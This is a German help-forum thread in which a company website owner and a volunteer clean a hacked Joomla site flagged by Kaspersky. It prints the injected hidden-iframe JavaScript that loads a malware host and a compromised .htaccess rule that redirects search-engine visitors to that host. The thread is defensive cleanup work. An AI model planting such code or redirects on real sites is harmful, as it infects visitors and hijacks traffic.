Trojan-Downloader.JS.Iframe.czd auf unserer Firmen-Homepage
 

Hallo,

beim Aufruf unserer Firmen-Homepage meldet Kaspersky die Fehlermeldung:

Kaspersky
Anti-Virus 6.0 für Windows Workstation
Der Zugriff wurde verweigert
Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich

Beim Zugriff auf die URL-Adresse:

hxxp://www.globalsped.de/

sind folgende Fehler aufgetreten:

Das angeforderte Objekt ist mit folgenden Viren INFIZIERT: Trojan-Downloader.JS.Iframe.czd


Bitte wenden Sie sich an Ihren Provider, wenn Sie diese Meldung für einen Irrtum halten.
Diese Meldung wurde erstellt:
08.01.2013 15:27:28
Kaspersky Anti-Virus 6.0 für Windows Workstation


und lässt keinen auf die Seite.
Ich habe die Homepage leider nicht programmiert und diejenige Person ist nicht mehr erreichbar, jedoch habe ich Zugang zu Strato und FTP-Server.

Könnt Ihr mir bitte helfen, wie ich den Trojaner loswerde?

Danke,

Hi
Gibts noch weitere Details, kaspersky zeigt manchmal noch an, welches Objekt betroffen ist. sehe mir die seite mal an

Ah, hab das schätzchin schon, durchsuche mal deine index.php bzw html in einem editor nach einem iframe und lösche das, wenn du dir das nicht selbst zutraust, kann ich das für dich tun

Hallo,
habe mir den ganzen Webspace per FTP runtergezogen.
Kaspersky hat die Datei gefunden ( Documentation.html ) und gleich entfernt.
Ich lade die Dateien gerade ohne dieser Datei rauf, mal schauen obs dann funktioniert.
Meldung von Kaspersky rechts unten in der Taskleiste:

Das Öffnen des schädlichen HTTP-Objekts <hxxp://www.globalsped.de/>: gefunden: trojanisches Programm 'Trojan-Downloader.JS.Iframe.czd'.

Danke,

EDIT: UUUPS ich war zu langsam mit lesen und schreiben ...
Ich hab mir die index angeschaut, kann aber nix finden.
Wäre super wenn du dir das mal anscahuen kannst ...

Wie gesagt, grad gesehen, durchsuche deine index dateien und gucke nach einem iframe was auf
heartofpole.net
leitet.
mit dem Löschen ists eh noch nicht getan, der Hack war durch Sicherheitslücken möglich, die du schließen musst

Hi
noch zufällig irgendwo ein Backup deiner Seite?

Da sind noch einige mehr betroffen, das kann n bissel dauern, nimm die seite mal so lange offline, damit sich keiner mit dem Rootkit infiziert, welches ihr verteilt

in den folgenen dateien suche nach:
_q[_n]('src' ...
Nicht die volle Zeile abgetippt.

cgi-data\general.tpl
neu\überwachung.html
neu\cache\index.html
neu\components\index.html
neu\images\index.html
neu\includes\index.html
neu\language\index.html
neu\libraries\index.html
neu\logs\index.html
neu\media\index.html
neu\modules\index.html
neu\plugins\index.html
neu\templates\index.html
neu\tmp\index.html
phpMyAdmin\Documentation.html

bitte alle diese Dateien bearbeiten, neu hochladen, und dann gucken wir mal.

Hallo und guten morgen,

habe die Seite kurz umgeleitet auf 2012, wo eine neue Homepage erstellt werden soll. Aber es soll noch die alte so lange laufen, bis die neue endgültig fertig ist.
Ich kann Dateien nicht runterladen, Kaspersky löscht diese gleich ...
Wie meinst du mit bearbeiten? Was soll ich mit der Zeile "_q[_n]('src' ..." machen?
Danke,

NACHTRAG: Am besten wäre es wenn die Joomla Version unter dem Ordner /neu wieder laufen würde.
Das war die "beste" Homepage ...

Hallo,
habe jetzt bei diesen genannten Dateien folgende Zeilen gelöscht und wieder hochgeladen:

<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'hxxp://heartofpole.net/xml.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script>

cgi-data\general.tpl war unter /cgi-data/global/general.tpl

und mit neu\überwachung.html meintest du wohl bewachung.htm ?

Habe die Domain www.globalsped.de jetzt auf /neu umgeleitet (dort wo ich das Script entfernt habe). Jetzt wird man auf google.de umgeleitet wenn man die Seite aufruft.

Danke für die Hilfe ...

Nochwas: Die Seite ist mit Joomla! gebaut worden, man kommt aucht nicht mehr ins backend: GLOBALSPED - Administration

Wenn das alles wieder funzt, ist euch eine Spende gewiss ...
Danke,

GLOBALSPED - Administration

hi
so, seite geht ja schon mal wieder. ich komm drauf.
bitte mal die neueste joomla version einspielen:

Joomla.de || Home || Übersicht
Download Joomla
aktuell ist 2.5
wir können uns dann noch an die sichere Konfiguration machen.

Hallo,

aktuell ist Joomla! Version 1.5.23 drauf.
Funktioniert mit einem update dann auch wieder alles so?
Das Template und so weiter?

Wenn ich ins Administrator-Menü will, kommt immer noch die Meldung beim Kaspersky.

globalsped . de / administrator (ohne Leerzeichen vor und nach / und . )

Danke,

Nachtrag: Ach ja, die Rechte habe ich auch neu vergben für ALLE Dateien bei FTP: Ordner: 755, Dateien: 644

steht da bei kaspersky auch die genaue datei? schau mal ob unter administrator auch ne index.html ist und gucke dann ob da die von mir genannte zeile drinnen ist.
Bevor du das update einspielst, mach halt nen Backup vorher.

Hallo,
hatte leider keine Zeit und war auch im Urlaub.

Ich dachte das Problem hat sich erledigt, was wohl doch nicht der Fall war, wie mich ein Kunde darauf hingewiesen hat.

Folgendes habe ich gemacht:
Die neuste Joomla! - Version draufgespielt
Jetzt geht das Admin-Menü wieder.

Aber wenn man bei google nach Globalsped sucht und das Ergebnis anklickt landet man entweder auf einer Seite für polnische leichtbekleidete Frauen (heart of Pole - oder so ähnlich) oder auf einer neuen google Seite ohne Suchbegriff. Das gleiche passiert auch wenn man beim Browser www.globalsped.de eingibt.
Allerdings wenn mann hxxp://globalsped.de eingibt landet man auf der richtigen Seite.
Ich kann den Fehler leider nicht finden und bitte euch das mal kurz anzuschauen.
@markusg: der FTP Zugang funktioniert wieder den ich dir geschickt habe

Danke nochmals,

hi
probleme erledigen sich nicht einfach von selbst...
und du musst halt auch deine Firmenpage schützen, mit updates etc, du hast ne Verantwortung den Kunden gegenüber und das beginnt auch meiner Sicht dann schon bei dem Update Stand der Homepage.
schau mal in die htaccess datei ob da merkwürdige umleitungen drinnen stehen, oder sende die mir mal, den Zugang hab ich nicht mehr gespeichert. :-)

Hallo,
in der .htaccess ist ein merkwürdiger Eintrag.
Kann ich das entfernen?

Ich habe mittlerweile die .htaccess durch eine leere .htaccess hochgeladen.

Hier der Inhalt der "verseuchten":
_________

#c3284d#
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|at search|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confe x|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google |goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|livein ternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|pas sagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmasch ine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ hxxp://heartofpole.net/xml.php [R=301,L]

</IfModule>
#/c3284d#


#######################################################################
# Diese .htaccess wurde vom STRATO-Webservermanager erstellt #
#######################################################################

Options -Indexes

AddType application/x-httpd-php5 .php .php3 .php4 .php5
____________________________

Mittlerweile leitet die Seite nur noch auf google.de um (wenn man bei google nach globalsped sucht und auf das ergebnis klickt bzw. man www.globalsped.de im Browser eingibt.
Wenn man im Suchergebnis auf eine "Unterseite" klickt landet man auf der Seite, ebenso wenn man hxxp://globalsped.de im Browser eingibt. Woran kann das noch liegen?

Danke